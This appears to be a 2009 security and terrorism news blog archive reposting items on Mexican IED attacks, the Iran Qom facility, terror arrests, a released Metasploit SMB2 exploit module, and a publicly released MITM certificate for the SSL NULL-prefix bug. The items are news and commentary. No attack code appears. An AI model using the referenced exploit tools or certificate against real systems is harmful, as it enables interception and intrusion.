Wednesday, September 30, 2009

Mexico: Emergence of an Unexpected Threat

Via Stratfor (Global Security & Intelligence Report) -

At approximately 2 a.m. on Sept. 25, a small improvised explosive device (IED) consisting of three or four butane canisters was used to attack a Banamex bank branch in the Milpa Alta delegation of Mexico City. The device damaged an ATM and shattered the bank’s front windows. It was not an isolated event. The bombing was the seventh recorded IED attack in the Federal District — and the fifth such attack against a local bank branch — since the beginning of September.

The attack was claimed in a communique posted to a Spanish-language anarchist Web site by a group calling itself the Subversive Alliance for the Liberation of the Earth, Animals and Humans (ASLTAH). The note said, “Once again we have proven who our enemies are,” indicating that the organization’s “cells for the dissolution of civilization” were behind the other, similar attacks. The communique noted that the organization had attacked Banamex because it was a “business that promotes torture, destruction and slavery” and vowed that ASLTAH would not stop attacking “until we see your ashes.” The group closed its communique by sending greetings to the Earth Liberation Front (ELF), the Animal Liberation Front (ALF) and the “eco-pyromaniacs for the liberation of the earth in this place.” Communiques have also claimed some of the other recent IED attacks in the name of ASLTAH.

On Sept. 22, authorities also discovered and disabled a small IED left outside of a MetLife insurance office in Guadalajara, Jalisco state. A message spray-painted on a wall near where the device was found read, “Novartis stop torturing animals,” a reference to the multinational pharmaceutical company, which has an office near where the IED was found and which has been heavily targeted by the group Stop Huntingdon Animal Cruelty (SHAC). Novartis is a large customer of Huntingdon Life Sciences, the research company SHAC was formed to destroy because Huntingdon uses animals in its testing for harmful side effects of drugs, chemicals and consumer items. A second message spray-painted on a wall near where the device was found on Sept. 22 read, “Novartis break with HLS.” Two other IEDs were detonated at banks in Mexico City on the same day.

These IED attacks are the most recent incidents in a wave of anarchist, animal rights, and eco-protest attacks that have swept across Mexico this year. Activists have conducted literally hundreds of incidents of vandalism, arson and, in more recent months, IED attacks in various locations across the country. The most active cells are in Mexico City and Guadalajara.

For a country in the midst of a bloody cartel war in which thousands of people are killed every year — and where serious crimes like kidnapping terrorize nearly every segment of society — direct-action attacks by militant activists are hardly the biggest threat faced by the Mexican government. However, the escalation of direct-action attacks in Mexico that has resulted in the more frequent use of IEDs shows no sign of abating, and these attacks are likely to grow more frequent, spectacular and deadly.

NULL Certificate Prefix Bug - MITM Cert - Merry Certmas!

Hello *,

In the spirit of giving and sharing, I felt it would be nice to enable other Noisebridgers (and friends of Noisebridge) to play around with
bugs in SSL/TLS.

Moxie was just over and we'd discussed releasing this certificate for some time. He's already released a few certificates and I thought I'd join him. In celebration of his visit to San Francisco, I wanted to release fun-times-at-moxie-marlinspike-high. This is a text file that contains a fully valid, signed certificate (with private key) that can be used to exploit the NULL certificate prefix bug[0]. The certificate is valid for * on the internet (when exploiting libnss software). The certificate is good for two years. It won't work for exploiting the bug for software written with the WIN32 api, they don't accept (for good reason) *! I suggest the use of Moxie's sslsniff[1] if you're so inclined to try network related testing. It may also be useful for testing code signing software.

It's been long enough that everyone should be patched for this awesome class of bugs. This certificate and corresponding private key should help people test fairly obscure software or software they've written themselves. I hope this release will help with confirmation of the bug and with regression testing. Feel free to use this certificate for anything relating to free software too. Consider it released into the
public domain of interesting integers.




Tuesday, September 29, 2009

Texas Gov. Perry's Web Site Hacked (Perhaps)

Via (Austin, TX) -

Gov. Rick Perry's web site was hacked into Tuesday morning just before the Governor was about to give live remarks on the site. A statement on the web site says that it was deliberately interrupted by a denial-of-service attack.

At around 11:30 a.m the web site displayed an error message that said “Unable to connect to database server.” Perry's spokesman Mark Miner called it internet sabotage. Perry was about to give a live webcast on Talkin' Texas. Below is the statement published on the site.

"Statement from Texans for Rick Perry Spokesman Mark Miner Concerning Internet Sabotage

Today’s ‘Talkin' Texas’ webcast by Gov. Perry was deliberately interrupted by a denial-of-service attack, preventing countless users from logging in to view the Governor’s remarks. This planned and coordinated attack was political sabotage, and we are working to identify those responsible for this illegal activity. Before the attack was initiated, more than 22,000 users were able to log in and view Gov. Perry’s complete remarks, which will be distributed shortly."


Before I can believe this "coordinated political sabotage" claim, I need to see a little more evidence.

Clearly, if the site was DDoS...then no one would have seen his remarks. So if 22,000 users were able to login and view his remarks...then it wasn't DDoS at a network level. So what happen?

And what is this “Unable to connect to database server.” error? Sounds like they maxed their backend database connections. Perhaps the site wasn't able to handle the load - which is far from "political sabotage".

Immunity Predicts Out of Band SMB2 Patch Unlikely

I asked the Immunity team to take a look into the new exploit to assess whether Microsoft would patch the SMBv2 bug early, and our initial assessment is "no, they will not."

Our assessment is that the exploit works by relying on some key magic numbers - one of which is what redirects execution to the payload. In some circumstances, this magic number is always the same - i.e. in VMWare or in some specific hardware configurations. However, in many situations (i.e. you don't have the exact same hardware the exploit expects) this number will be different, resulting in a bluescreen.

Working around this issue in the current public exploit is probably two weeks of work. At that point, we're nearing Microsoft Tuesday and the need for an out of band patch is moot.


For those that haven't been watching the twitter feeds, there has been some discussion between security folks on the reliability of the current SMB2 Code Execution module.

HD Moore ( -
@bobmcmillan definitely works on at least *some* physical machines, but looks like it could use more testing. @msuiche says multi-cpu breaks

Convicted Cybercriminal Locks Down Computers During Prison Programming Project

Via The Register UK -

A UK prison computer system was left in lockdown after jail bosses gave a convicted cybercriminal the task of reprogramming it, the Sunday Mirror reports. Douglas Havard, 27, an inmate at Ranby Prison, Nottinghamshire, was asked to take over a project to create an internal TV station using the jail's computer network. Havard is half-way through a six year term over his involvement in a £6.5m hacking and phishing scam (more details here), something the prison governors must have reckoned gave him the requisite computer programming skills. [...] Havard and Elwood were arrested following a National Hi-Tech Crime Unit (NHTCU) investigation into eastern European phishing fraudsters.

After he was reportedly left unsupervised during the prison programming project, Havard spent his time altering system passwords so that everyone else was locked out. Prison bosses had to hire external consultants to sort out the resulting mess. Meanwhile Havard was put into segregation as punishment.

Another inmate at Ranby Prison recently managed to get a key cut that was capable of opening every door at the jail.

A Prison Service spokesman told the Sunday Mirror that the computer breach at Ranby was under investigation. He denied that lags were given unsupervised access and added: "The prisoner was not able to access records of any other prisoners."


WTF? Why not give the stabbing mass murder in C-Block the responsibility of sharpening the Chef's knives as well?

Sounds like this prison has a serious complacency problem. They think they are in control...which they clearly aren't.

The Qom Uranium Enrichment Facility – What and How Do We Know?

Via FAS Strategic Security Blog -

On Friday, President Obama, President Sarkozy, and Prime Minister Brown revealed a covert Iranian uranium enrichment facility near Qom. Obama announced that “the size and configuration of this facility is inconsistent with a peaceful nuclear program.” In a briefing , Senior White House Administration Officials clarified that the facility is designed to hold about 3,000 centrifuges. Although, this number is not large enough to “make sense from any commercial standpoint, […] enough for a bomb or two a year, it’s the right size.”

It is too early to independently verify the US statement that Iran is planning on setting up 3,000 centrifuges at Qom until the IAEA receives and confirms design plans of the facility. Although the circumstantial evidence certainly isn’t helping Iran’s peaceful nuclear energy claim, we cannot definitively conclude that the enrichment plant has a military function. Senator Feinsten, the Chairman of the Senate Intelligence Committee said that Iran’s “intention to produce weapons-grade uranium in the Qom facility has not yet been proven,” although there are strong indications.


According to unclassified US documents released by ISIS, although the Qom plant is reportedly located on an Islamic Revolutionary Guard Corps Base, it is managed by the Atomic Energy Agency of Iran.

So, is the “size and configuration” of the Qom plant inconsistent with a peaceful nuclear facility? Not entirely. While the circumstantial evidence raises suspicions, based on available evidence, we cannot currently prove it is a military facility. First, we have no way to confirming the Administration’s statement that Iran will set up 3,000 centrifuges at Qom until the IAEA receives and verifies design information of the facility. Even if the intelligence was correct, Iran could have changed its plans since the existence of the facility became public, especially if no machines have been set up yet. The 3,000 announced centrifuges by the US are definitely not enough for industrial-scale production of LEU for nuclear reactor fuel. However, this doesn’t automatically mean that the facility was meant for bomb production. We don’t know how the plant is configured since, again, no machines have been installed. And, again, this will not be known until inspectors are on the ground.

The facility’s protected and heavily disguised location certainly isn’t helping Iran’s peaceful nuclear program claim. Although repeated Israeli threats of an attack may have developed circumstances for Iranian nuclear safety concerns, this does add to Iran’s track record of ambiguous behavior.

Since the technology to enrich uranium to a small degree for nuclear fuel and to a large degree for nuclear bombs is the same, ultimately the question falls on proving Iran’s intent. The US has admitted that intension to produce HEU has not yet been proven, despite the indications for clandestine activity. If Iran is developing a peaceful program, then it should assuage concerns by adopting further transparency measures, like implementing the revised Code 3.1 of the Subsidiary Arrangements and ratifying the Additional Protocol. On the bright side, US intelligence was good enough to be able to detect a covert nuclear facility. And Iran’s letting inspectors in at Qom is good news.


Great review of the public intelligence on the Qom Facility. See the full FAS blog for more details, including possible uranium enrichment scenarios...

Harakat Al-Shabab Mujahideen Executes Two Men Accused of Spying for CIA & AMISOM Troops

Via -

The Islamist fighters of Harakat Al-shabab Mujahideen have Monday executed two men accusing of spying for CIA and the AMISOM troops in the Somali capital Mogadishu.

Sheik Ali Mohamed Hussein, the representative of Harakat Al-shabab Mujahideen for Banadir region was among more people who gathered at Maslah building in north of the capital where the executing sentence happened saying that the men were three pointing out that two of them were sentenced to death while the other one was flogged 29 slashes and ordered to be exiled from the country.

The representative of Harakat Al-shabab Mujahideen said that executed men were spying for the CIA and the African Union troops AMISOM while the other flogged man was charged making false US dollar money adding that they are also planning other criminals to bring them before the Islamic court to be sentenced like those ones.

Sheik Ali Mohamed said they executed the men as the Islamic court found them guilty pointing out that they were also the mastermind of killing of Salah Nabhan and Mo'allin Aden Hashi Erow.

Monday, September 28, 2009

Facebook HTML Injection

Apple Pushes Unwanted iPhone Enterprise Tool to Windows Users

Via -

Apple is telling iTunes and QuickTime users on Windows that they need to download the iPhone Configuration Utility, an enterprise tool that is useless for most consumers, via its Apple Software Update program for Windows.

Apple is once again using its updating program that comes with iTunes and QuickTime on Windows to push unwanted software. This time around, the software in question is an iPhone enterprise tool that is more than useless for most consumers.
ZDNet spotted the update, though when we asked around we learned it was actually pushed out earlier this month. Nevertheless, we downloaded iTunes and installed it on a Windows 7 machine to see if we could reproduce the annoyance. We could. Apple is, for whatever reason, pushing enterprise software to Windows PC users who use Apple software.

Here's the description Apple gives for the iPhone Configuration Utility:
Configuration Utility lets you easily create, maintain, encrypt, and install configuration profiles, track and install provisioning profiles and authorized applications, and capture device information including console logs.

Configuration profiles are XML files that contain device security policies, VPN configuration information, Wi-Fi settings, APN settings, Exchange account settings, mail settings, and certificates that permit iPhone and iPod touch to work with your enterprise systems. For instructions on how to use iPhone Configuration Utility, see the iPhone and iPod touch Enterprise Deployment Guide, available for downloading at

Not only is this irrelevant to many iTunes users, since most of them don't even have an iPhone, it's cleary an enterprise tool that even the majority of iPhone users don't need or want. This "update" should not be checked by default, and instead should be clearly marked as optional. To go even further, though, an update utility should not be prompting to install new software. This is a new program that Apple Software Update is pushing to users, and not an update for a program or programs the user already has installed. If Apple finds it necessary to include its update tool to anyone who installs iTunes or QuickTime, the company should make sure it only offers updates for installed software, and not push out new software whenever it feels like it.

Apple has been called out in the past for using its updater to push unwanted applications out to Windows users, but it looks like the bad press hasn't had any long term impact. In March 2008, Apple was heavily criticized for pushing Safari to iTunes and QuickTime users, also through Apple Software Update on Windows. The obvious goal was to increase the browser's small market share on Windows (and it worked, if not at least temporarily), but the way the company decided to do so was very sly.

The next month, Apple posted an "update to Software Update for updating software updates" which added a "New Software" category for listing any Apple software for Windows that is not already installed separately from other updates. Unfortunately, it looks like Cupertino isn't following the rules it created in response to the previous outcries. In the screenshot above, you can see that the MobileMe Control Panel is in this category, but why isn't the iPhone Configuration Utility?


Someone please remind Apple that they do have Windows customers....rather they like it or not.

I am a MacBook Pro user...I am a iPhone user...but I am also a Windows XP user and I wish Apple would take a second to remember they aren't the center of the world....hell, they aren't even 6% of the OS market share.

SMB2 Code Execution Module Released for Metasploit

Via Metasploit Blog -

This [Sunday] morning Stephen Fewer released his long-awaited SMB2 code execution module for the Metasploit Framework. He plans to publish a whitepaper in the near future that discusses the exploit technique and the newly written Vista/2008 ring0 to ring3 stager code. This module is available in the 3.3-dev tree and supports Vista SP1/SP2 and 2008 SP1/SP2 (but not R2) with the same offsets and addresses. Keep in mind that the best workaround for this still-unpatched flaw is to disable the SMB2 protocol.


According to the exploit module...
This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.

Sunday, September 27, 2009

Satellite Imagery of Possible Site of the Qom Enrichment Facility in Iran

Via Olge Earth -

During the North American day yesterday ISIS chimed in with its best guess (PDF) for where Iran's newly declared underground nuclear fuel enrichment plant is situated — two guesses, in fact.

One of them is the same as the location identified in the previous post here on Ogle Earth as a likely candidate for the site. But ISIS also identifies another possible location further to the east.

ISIS has the benefit of very recent imagery it commissioned, taken by DigitalGlobe — August 2009 for the already-identified candidate, and January 2009 for the new candidate. The new candidate in particular shows much development work in the intervening four years between when the base imagery in Google Earth was taken and the DigitalGlobe imagery acquired in 2009.



The other candidate, to the west, shows little outward change in the intervening four years. Based on the 2009 imagery, my inexpert opinion now favors the new candidate identified by ISIS.

ISIS's findings are in PDF format, so I took the images therein and positioned them as overlays in Google Earth. Here they are available as a KMZ download. Play with the opacity slider in the sidebar to switch between 2009 and 2005.

(Note: Because the imagery is of hilly terrain and taken from a different position in the sky, it is not perfectly alignable with the base imagery.)

Saturday, September 26, 2009

Taliban Commander Known as “the Butcher” Dies After Arrest in Swat Valley

Via (Terrorism Monitor Volume: 7 Issue: 29) -

The Pakistani military’s powerful offensive in Swat has destroyed much of the terror network of the Taliban. The fiery “FM Mullahs” who once announced death threats to opponents on their radio networks are now silenced. Their readily available spokesmen claiming responsibility for the daily deadly attacks on security forces are now in government custody. The men who flogged those considered to be in violation of Islamic law have either been killed or captured. Above all, in a recent development, the notorious head of the Taliban’s throat-cutter squads, Sher Mohammad Qasab, was arrested and subsequently died while in government custody (Dawn [Karachi], September 20).

Qasab was a symbol of terror, having slaughtered police and military officials and all other opponents, including “spies” and members of anti-Taliban tribal militias. He did this publicly and sometimes on videotape to terrorize the rest of the people. He used to make piles of heads in the notorious Green Chowk (later known as Khooni Chowk, or Bloody Square) in the Swat capital of Mingora, once famous for tourism and scenic spots. The mutilated and decapitated bodies were often left hanging on poles with threatening notes.

The arrest and death of Sher Mohammad Qasab is considered to be a major blow to the Taliban network in Swat. His capture marked the fourth high profile elimination of a Taliban commander in Swat this month after the capture of Taliban commander Mehmood Khan, the capture of Taliban spokesman and organizer of suicide bombings Muslim Khan, and the killing of fiery “Radio Mullah” Shah Dauran, who used to announce every evening the names of those waiting in the death queue (Daily Times [Lahore], September 4; September 12).

Flash Version of Visitors - More Than 50% Vulnerable

According to my Google Analytics, less than half of my visitors in the last month...are running updated version of Adobe Flash.

Sadly, this number isn't quite surprising, even given the security implications of running old Flash. Those that are running 10.0.22 are vulnerable to at least 10 different security vulnerabilities.

If you aren't sure what version of Adobe Flash your browser supports, then I would highly recommend checking out Adobe's Flash Version Tester. At the time of this post, the latest & "greatest" version of Flash is

About 80% of my visitors are running either IE or Firefox on Windows. For Windows users, I would recommend using Secunia's Online Online Software Inspector (OSI). The Secunia Online Software Inspector, or short OSI, is a fast way to scan your PC for the most common programs and vulnerabilities, thus checking if your PC has a minimum security baseline against known patched vulnerabilities. It checks for outdated versions of Adobe Flash, Sun Java, Quicktime, iTunes...and much more. It does require that Java be enabled for it to work...

Adobe provides uninstallers and installers for most of the major operating systems, so get to patching!

Iran to Allow IAEA Inspectors into Nuclear Plant

Via VOA News -

Iran says it will allow inspectors from the International Atomic Energy Agency into its newly disclosed uranium enrichment plant.

Iran's nuclear chief, Ali Akbar Salehi, said Saturday on Iranian state television the timing of the visit will be worked out with the IAEA.

Earlier, a top aide to Iran's Supreme Leader said the Iranian nuclear facility should be operational soon.

The chief of staff to Ayatollah Ali Khamenei told Iran's Fars News Agency that "God Willing, the new plant will be operational soon and make the enemy blind."

On Friday, U.S. President Barack Obama and other Western leaders accused Iran of building a secret nuclear plant and insisted the IAEA have immediate access to ensure it is not being built to produce nuclear weapons.

Iran denied the facility has been a secret.

Iranian President Mahmoud Ahmadinejad said Iran complied with IAEA rules by informing the agency early enough that the facility near the holy Shi'ite city of Qum was under construction.

In Israel Saturday, Foreign Minister Avigdor Lieberman said the newly disclosed atomic facility was proof Iran is seeking nuclear weapons. He said he hopes world powers will give an "unequivocal" response when representatives from Germany, the U.S., Britain, France, China and Russia meet with Iranian officials in Geneva on October 1.

Friday, September 25, 2009

Al-Qaida and the German Elections

Via -

Usama Bin Ladin has just released a new audio statement to the European peoples. It is relatively short (under 5 minutes) and basically tells the Europeans to get out of Afghanistan. The statement is subtitled in German and is clearly timed to coincide with the German elections this coming Sunday.

Bin Ladin’s statement comes in addition to a series of three statements from Bekkai Harrach threatening Germany. I have not seen this kind of jihadi media offensive in connection with any other non-US election. Of course, I, like everyone else, can’t help thinking of the Spanish elections in 2004.

Peter Neumann at FREEradicals has a good analysis where he reveals that German intelligence are very nervous. Should they be?

Personally I think al-Qaida would not issue all these messages if something really big was in the making in the next few days, precisely because media offensives put intelligence services on high alert.

My guess is that these messages are primarily intended to influence German public opinion at a crucial juncture in the Western campaign in Afghanistan. Germany is a pivotal player in the coalition; her withdrawal could initiate a vicious (or virtuous, depending on one’s preferences) circle of European withdrawals from the Afghanistan enterprise. Al Qaida is focusing the weakest link in the coalition, just as the Madrid bombers were advised to do.

Another function of messages such as this is to set the stage for attacks that may be several months away. By warning Germans before the elections, al-Qaida can punish them afterwards for not doing as he said.

Finally, Bin Ladin and Harrach are probably also hoping that these messages will inspire some independent initiatives from grassroots jihadists in Europe. Today’s arrest of a man in Stuttgart suspected of distributing the video suggests there are people inside Germany who are thus inclined. On a related note, Leah at All Things CT has a post about forum reactions to the Bin Ladin message.

In short, there are good reasons for German analysts to be working some overtime this weekend.

Jordanian Arrested Over Dallas Bomb Plot

Via Maktoob Business (Terrorism) -

A Jordanian man was arrested and charged with attempting to blow up a skyscraper in Dallas on Thursday, the latest in a series of alleged bomb plots disclosed by U.S. officials.

A U.S. Justice Department statement said Hosam Maher Husein Smadi, 19, was arrested after planting an inert bomb at Fountain Place, a 60-story glass tower in downtown Dallas following an undercover FBI operation.

Details of Smadi's arrest were disclosed hours after authorities in Illinois revealed a broadly similar case in Springfield.

Smadi was described as a Jordanian citizen staying in the United States illegally who had "repeatedly espoused his desire to commit violent Jihad," the Justice Department said.

"The highest priority of the FBI and the Department of Justice remains the prevention of another terrorist attack within the United States," said James Jacks, U.S. Attorney for the Northern District of Texas.

"The identification and apprehension of this defendant, who was acting alone, is a sobering reminder that there are people among us who want to do us grave harm," he added in a statement.

Officials stressed however that Smadi's arrest was unrelated to an ongoing investigation in Colorado and New York involving an Afghan-born airport worker accused of plotting a bombing campaign.

The Justice Department statement said Smadi had declared his willingness to serve as a "soldier for Osama Bin Laden and Al Qaeda" and to conduct Jihad.

He is alleged to have told undercover FBI agents posing as members of an Al Qaeda sleeper cell that he had come to the United States specifically to commit "Jihad for the sake of God."

Smadi has been charged with attempting to use a weapon of mass destruction.

Iran on Defensive Over Undeclared Enrichment Site - Near Qom

Via BBC -

The announcement of a second uranium enrichment site puts Iran on the defensive as it tries to head off further sanctions.

The site - said to be near Qom - was acknowledged by Iran in a letter to the International Atomic Energy Agency (IAEA) on Monday, only just pre-empting an announcement by US President Barack Obama. Western intelligence agencies discovered the site some time ago, according to the New York Times.

In its letter to the IAEA, Iran sought to downplay the site's importance, saying that it was a pilot plant still under construction.

The announcement about this site is an embarrassment to Iran, which has said that it is cooperating with the IAEA.

The problem for Iran is that this will increase the suspicions many governments have about its secrecy and its intentions. Under the terms of its agreement with the IAEA, it should have told the agency at the planning and design stage. Iran has tried to repudiate this agreement, so might argue that it did not yet have to report the plant, but the IAEA says that such repudiations are not permitted.

Some fear that Iran is developing at least a nuclear-weapon capacity, with a view to making a bomb one day. Iran says it is against nuclear weapons and is simply making fuel for nuclear power.

Iranian ambitions for this site are not known. It could be that they wanted a back-up in case their main plant at Natanz was attacked. But another fear is that they intended to enrich uranium more highly at the secret plant, to a level suitable for a nuclear explosion.

President Obama said that its size and scope was "inconsistent" with a peaceful programme.

Mark Fitzpatrick of the International Institute for International Affairs said the 3,000 centrifuges estimated to be at the plant would not be enough to make any nuclear fuel but could be used to enrich enough uranium to the higher level needed for a nuclear explosion.

He said that Iran did appear to be in violation of its IAEA safeguards agreement.

"Common sense also dictates that at this time Iran would have been open if it had nothing to hide," he added. "This shows it is far from being on the up-and-up."

The discovery will strengthen the demands by the US and its allies for further sanctions to be imposed on Iran unless it suspends all enrichment, as required by the Security Council.

This might help explain why this week Russia appeared to soften its opposition to further sanctions.

The US wants Iran's oil and gas industries to be targeted. Current Security Council sanctions aim principally at its nuclear and ballistic missile work.

President Obama demanded that the new site be opened immediately to IAEA inspection.


According to CNN...

The second nuclear facility, on a military base near the Shia Muslim holy city of Qom, is thought to be capable of housing 3,000 centrifuges, not enough to produce nuclear fuel to power a reactor, but sufficient to manufacture bomb-making material, a U.S. diplomatic source who read the letter told CNN.

Honda's Unveils U3-X Unicycle for Robots

Honda on Wednesday unveiled the U3-X, a stool with a unique directional wheel system that allows it to travel diagonally, as well as right, left, forward, and backward.

It's basically a robotic unicycle.

The device is able to readjust itself so that instead of riders having to constantly balance themselves, the robotic unicycle does the compensating.

Honda pointed out in its unveiling video that the U3-X's seat is slightly higher than an average person's waistline, forcing riders to jump up slightly to sit on it and place their feet on a foot rest. This elevated height of the robotic unicycle leaves riders at relative eye level with passing pedestrians while in motion, according to Honda.

It's a nice touch. A common complaint among people in wheelchairs are the social and psychological effects of literally being looked down upon while traveling the world in a sitting position. But requiring the rider to be able to hold upright while on a backless seat clearly disqualifies the U3-X as a wheelchair substitute for many.

And in this age of rising obesity, who among the fitness-conscious is really going to ride the streets on a robotic stool when they can get a little chance at some exercise during their busy day by walking?

It's just one of those things you know no one is really going to buy. So why, then, did Honda unveil the U3-X robotic unicycle?

Like the Segway, the U3-X is more about showing off an engineering breakthrough than selling an actual product. In this case, Honda contributes to the ongoing discourse on mobility among roboticists.


Honda's HOT Drive System (Honda Omni Traction Drive System), the omni-directional wheel Honda claims is the "world's first wheel structure which enables movement in all directions" adds to this ongoing discourse on mobility.

Note Honda's word choice in describing their system.

The U3-X is not the first multi-directional rolling robot and Honda knows this. Carnegie Mellon, for example, unveiled the Ballbot in 2006. But the method Honda uses--which includes synchronizing small motor-controlled wheels to make the U3-X multi-directional--is unique.

Honda's U3-X also includes balance control technology that allows the device to respond to how its load shifts and readjust balance accordingly while on the go.

"The incline sensor detects the incline of the device based on the weight shift of the rider and determines the rider's intention in terms of the direction and speed. Based on the data, precise control is applied to return the device to an upright position, which achieves smooth and agile movements and simple operation by weight shift only," Honda said in a statement.

MMS Debuts for the iPhone

So today is the day, Sept 25th...the day AT&T and Apple will push out a carrier file update via iTunes and enable MMS.

Plea Deal Clears NGA Intelligence Analyst of Felony Hacking

Via (Threat Level) -

Federal prosecutors dropped a felony hacking charge Thursday against a Defense Department intelligence analyst who poked around in a system involved in a national terrorism investigation.

The analyst, Brian Keith Montgomery, pleaded guilty to a misdemeanor charge instead, settling the case and making prison time unlikely.

Montgomery held a top secret clearance while working on a covert program at the National Geospatial-Intelligence Agency — the spy agency in charge of satellite and aerial image collection. On April 9, while stationed at an NGA facility on Fort Belvoir in northern Virginia, the 10-year agency veteran saw a message that “provided significant detail about a classified operation” that was unrelated to his job, according to a court affidavit filed by a Pentagon investigator.

The analyst twice logged in to a system involved in the terrorism investigation: first on April 9, when he stayed on for two hours, and then on April 14. He’d gotten the password from another classified message to which he also had legitimate access. Montgomery later told investigators that he hadn’t noticed a warning in the message advising that only personnel participating in the classified operation were authorized to use the password.

Court records say little about the system Montgomery logged into, except that it was was being used from around the United States, and was being monitored by the FBI and other law enforcement agencies at the time of Montgomery’s access.

By accessing the system, Montgomery endangered the terrorism investigation, and “caused harm to the U.S. Army and the FBI,” according to an affidavit by Dexter Wells, an agent with the Defense Criminal Investigative Service.

Federal prosecutors in the Eastern District of Virginia charged Montgomery on Sept. 11 with a single felony count under a provision of the Computer Fraud and Abuse Act that covers intrusions in which damage is done or public safety is jeopardized.

The charge was dropped in a plea deal on Wednesday. Montgomery pleaded guilty to new, lesser charge of exceeding his authorized access to the NGA computer on which he read about the terrorism operation and obtained the password to the unnamed system. The misdemeanor carries up to a year in prison, but sentencing guidelines suggest probation for a first offense.

In an interview with Threat Level last week, Montgomery said he was being made a scapegoat for a security slip-up that sent the password to thousands of analysts without the need-to-know.

“In my opinion, go after the person who provided me with that information,” he told Threat Level last week. “I was just a consumer. I wasn’t the person who put that username and password out there for tens out thousands of analysts to see.”

The United States’ Attorneys office has not returned a phone call on the case. Montgomery and his attorney did not immediately return phone calls Thursday.

Al-Qaida Declares New "Cabinet Roster" for its "Islamic State of Iraq" (ISI)

Via CT Blog (Sept 21, 2009) -

Al-Qaida's "Islamic State of Iraq" (ISI) has issued an updated leadership "cabinet roster." The roster reads as follows:

- Deputy Emir and Minister of War: "Abu Hamza al-Muhajir, Abdel Moneim al-Badawi"
- Minister of Shariah Councils: "Shaykh Abdul Wahab al-Mashhadani"
- Minister of Public Relations: "Shaykh Mohammed al-Dulaimi"
- Minister for Prisoners and Martyrs: "Shaykh Hassan Jubouri"
- Minister of Security: "Professor Shaykh Abdul Razzaq al-Shammari"
- Minister of Health: "Dr. Shaykh Abdullah Qaisi"
- Minister of Information: "Shaykh Professor Ahmad al-Tai"
- Minister of Petroleum: "Shaykh Osama Laheebi"
- Minister of Finance: "Shaykh Professor Yunis al-Hamdani"

First Draft of a Framework for Building a Smart Grid Unveiled

Via -

Commerce Secretary Gary Locke has unveiled the first draft of a Smart Grid framework that lays the foundation for a secure, interoperable, next-generation power distribution system.

The report, titled "Framework and Roadmap for Smart Grid Interoperability Standards, Release 1.0" and developed by the National Institute of Standards and Technology, identifies about 80 existing standards that apply to the development of the new grid infrastructure, and outlines steps to address key gaps remaining to be addressed.

“The Smart Grid will ultimately require hundreds of standards,” the framework says. “Some are more urgently needed than others,” because equipment such as smart meters that can monitor residential power use and provide data back to the utility, already are being deployed. The current report “is only the beginning of an ongoing process that is needed to create the full set of standards that will be needed to manage their evolution in response to new requirements and technologies.”

The framework is the product of the first phase of an aggressive three-phase program by NIST to establish Smart Grid standards by the end of the year.


NIST’s three-phase approach to standards development is:
  • Develop a consensus among utilities, equipment suppliers, consumers, standards developers and other stakeholders on needed standards; and producing a Smart Grid architecture, an initial set of standards to support implementation and plans for developing remaining standards by early fall;
  • Finalization of today’s report after a 30 day comment period will complete this phase;
  • Launch formal partnerships to develop the remaining needed standards; and
  • Develop a program for testing and certification to ensure that Smart Grid equipment and systems comply with standards;

Thursday, September 24, 2009

Photo of the Day - Series of Tubes Entrance

Entrance to the series of tubes?

I told this photo just outside of the Peppermill during Defcon 17.

Contractor Pleads Guilty to SCADA Tampering

Via -

A former IT consultant for an oil and gas exploration company has pleaded guilty to tampering with the company's computer systems after he was turned down for a permanent position with the company.

Mario Azar, 28, pleaded guilty on Sept. 14 to one count of damaging computer systems and faces a maximum of 10 years in prison. News of his plea was announced Wednesday by the U.S. Federal Bureau of Investigation.

According to court records, Azar accessed Supervisory Control and Data Acquisition (SCADA) computer systems belonging to Pacific Energy Resources of Long Beach, California, and caused the company to lose control of its computer systems around May or June of 2008.

Only a handful of SCADA computer intrusions have been reported, but because the systems are used to control large-scale industrial systems in manufacturing plants, public utilities and the chemical industry, security experts worry that tampering with them could lead to a large-scale power outage or environmental disaster.

Azar played a role in setting up a system that helped the company communicate between its headquarters and oil platforms, and which was also used to detect leaks on the company's oil platforms. He had several user accounts on company systems, authorities said.

His actions caused thousands of dollars in damage, authorities said, but did not cause oil leaks or
otherwise harm the environment.

He is due to be sentenced on Dec. 7 in United States District Court for the District of Los Angeles.

United Nations Adopt US-Drafted Resolution on Nuclear Weapons

Via VOA News -

The United Nations Security Council has unanimously approved a resolution to increase efforts to eventually rid the world of nuclear weapons.

U.S. President Barack Obama presided over a special session of the Security Council Thursday.

The leaders of all 15 Security Council member nations voted for the U.S.-drafted resolution.

The plan sets a framework for dealing with nuclear arms reduction, disarmament and the threat of nuclear terrorism.

It calls for states to set up specific goals on nuclear arms reduction and disarmament, bolsters the Nuclear Non-proliferation Treaty, and calls for greater security of nuclear weapons materials to prevent them from falling into the hands of terrorists.

The resolution singles out Iran and North Korea as "major challenges" to the Security Council's efforts on non-proliferation.

Mr. Obama is the first U.S. president to chair a summit-level meeting at the council.

Also Thursday, U.S. Secretary of State Hillary Clinton will give the opening speech of a two-day conference on the Comprehensive Test Ban Treaty. This is the first time a U.S. delegation has participated in the biennial conference since 1999.

Clinton's husband, former U.S. President Bill Clinton, signed the treaty in 1996, but the U.S. Senate rejected it three years later.

US Charges Najibullah Zazi with Bomb Plot

Via VOA News -

An Afghan-born man detained in the United States as part of a terror investigation has been charged with conspiring to detonate bombs in the U.S.

The indictment unveiled Thursday in New York alleges Najibullah Zazi spent more than a year plotting the attack with others.

The government says Zazi "received detailed bomb-making instructions in Pakistan, purchased components of improvised explosive devices and traveled to New York City on September 10, 2009" to move forward with his plans.

Zazi was detained in the midwestern U.S. state of Colorado Saturday along with his father, Mohammed Wali Zazi, on charges of lying to counterterrorism investigators. A third Afghan man, Ahmad Wais Afzali, was detained in New York City the same day on the same charges.

All three men are legal permanent residents or naturalized citizens of the United States.

The U.S. Department of Justice says the government wants Zazi to be transferred to New York to face this new charge.

Zazi has denied any links to terrorism.

The 24-year-old was born in Afghanistan and moved to Pakistan as a boy before relocating with his family to the U.S. about 10 years ago.


Check out this LATimes article for more details....
"Zazi remained committed to detonating an explosive device up until the date of his arrest, as exemplified by among other things, traveling overseas to receive bomb-making instructions, conducting extensive research on the internet regarding components of explosive devices, purchasing -- on multiple occasions -- the components necessary to produce TATP [Triacetone Triperoxide] and other explosive devices, and traveling to New York City on September 10, 2009 in furtherance of the criminal plan," a Justice Department detention memo states.

Wednesday, September 23, 2009

